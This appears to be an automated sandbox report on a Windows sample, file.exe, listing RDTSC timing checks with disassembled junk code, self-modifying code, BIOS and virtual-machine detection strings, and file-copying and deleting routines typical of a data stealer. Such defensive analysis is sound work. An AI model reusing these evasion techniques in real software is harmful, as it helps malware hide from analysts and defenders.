                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C3D2 second address: D2C3D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2CA80 second address: D2CA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2CA84 second address: D2CAAA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F6398F5B4A5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e jns 00007F6398F5B496h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2CAAA second address: D2CAD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F6398F5ECA7h 0x0000000c jns 00007F6398F5EC98h 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D33384 second address: D33389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D33389 second address: D33399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6398F5EC9Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D427F8 second address: D42813 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6398F5B496h 0x00000008 jmp 00007F6398F5B4A1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42813 second address: D4282B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6398F5ECA3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4282B second address: D42837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6398F5B496h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42837 second address: D42842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D42842 second address: D42846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46A90 second address: D46A98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46A98 second address: D46AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6398F5B49Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4CC57 second address: D4CC66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6398F5EC96h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4CC66 second address: D4CC6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D4CC6A second address: D4CC6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D9B4 second address: D5D9D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F6398F5B4A1h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D9D1 second address: D5D9EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6398F5ECA9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D9EF second address: D5D9F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D9F5 second address: D5D9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C3AB second address: D5C3B6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jng 00007F6398F5B496h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C521 second address: D5C52A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C6AA second address: D5C6AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C6AE second address: D5C6B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C6B2 second address: D5C6C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F6398F5B49Ch 0x0000000e jl 00007F6398F5B496h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C98E second address: D5C998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6398F5EC96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C998 second address: D5C9BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5B4A3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F6398F5B49Ah 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5C9BB second address: D5C9C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5CB24 second address: D5CB3F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6398F5B4A5h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5D700 second address: D5D704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6226E second address: D62282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6398F5B49Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61DFE second address: D61E08 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6398F5EC96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61E08 second address: D61E0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61F92 second address: D61F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6398F5EC96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D61F9C second address: D61FCC instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6398F5B4AAh 0x00000008 jmp 00007F6398F5B49Eh 0x0000000d jp 00007F6398F5B496h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a jo 00007F6398F5B496h 0x00000020 jno 00007F6398F5B496h 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D69549 second address: D6955F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6398F5ECA2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6955F second address: D6958F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6398F5B4A9h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F6398F5B49Eh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6958F second address: D69594 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EE86 second address: D6EE9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6398F5B4A3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EE9D second address: D6EEA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EEA3 second address: D6EED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F6398F5B4A9h 0x0000000c jmp 00007F6398F5B4A3h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6398F5B49Eh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6EED2 second address: D6EEE6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6398F5EC96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b ja 00007F6398F5ECA4h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D80320 second address: D80326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8D92D second address: D8D94B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6398F5EC9Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8D94B second address: D8D95C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5B49Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8D95C second address: D8D968 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F6398F5EC96h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D914BD second address: D914C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D914C6 second address: D914CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D914CA second address: D914E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F6398F5B4A2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D914E2 second address: D91513 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6398F5ECA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F6398F5ECA3h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91513 second address: D9151E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F6398F5B496h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91ABF second address: D91AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91AC5 second address: D91ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91ACA second address: D91AE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6398F5ECA8h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91AE8 second address: D91AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91AEC second address: D91AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91AF9 second address: D91AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91AFF second address: D91B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91B04 second address: D91B22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6398F5B4A8h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91B22 second address: D91B35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5EC9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91B35 second address: D91B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92239 second address: D9223D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9223D second address: D92241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92241 second address: D92247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D93CDB second address: D93CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D93CE4 second address: D93CE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D93CE8 second address: D93CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6398F5B496h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D93CF4 second address: D93D1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6398F5ECA8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F6398F5EC9Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D93D1E second address: D93D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F6398F5B496h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D93D30 second address: D93D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D93D34 second address: D93D69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6398F5B4A6h 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F6398F5B4A1h 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D965DC second address: D965E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6398F5EC96h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96830 second address: D96879 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007F6398F5B49Bh 0x00000010 push 00000004h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F6398F5B498h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c and dh, 0000004Fh 0x0000002f mov dx, bx 0x00000032 push A80917B8h 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jng 00007F6398F5B496h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96879 second address: D9687F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96A16 second address: D96A3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jc 00007F6398F5B496h 0x0000000d push dword ptr [ebp+122D3196h] 0x00000013 mov dx, ax 0x00000016 call 00007F6398F5B499h 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e js 00007F6398F5B496h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96A3E second address: D96A6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5ECA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F6398F5EC9Ch 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D97F6C second address: D97F71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D99F04 second address: D99F3D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6398F5ECACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007F6398F5ECA5h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D99F3D second address: D99F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D703CE second address: 4D703D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D703D4 second address: 4D703F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F6398F5B4A6h 0x0000000f pop ebp 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70451 second address: 4D70460 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5EC9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70460 second address: 4D704C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5B4A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F6398F5B4A1h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F6398F5B49Eh 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F6398F5B49Ah 0x0000001e sub cx, 1AD8h 0x00000023 jmp 00007F6398F5B49Bh 0x00000028 popfd 0x00000029 popad 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov dx, ax 0x00000031 popad 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B1192F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B119A7 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CABD64 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CAA788 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CBE80E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D38567 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_008C38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_008C4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_008BDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_008BE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_008BED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_008C4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_008C3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_008BF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_008B16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_008BDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008BBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_008BBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B1160 GetSystemInfo,ExitProcess,0_2_008B1160
                Source: file.exe, file.exe, 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1528463246.0000000000815000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1528463246.00000000007E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
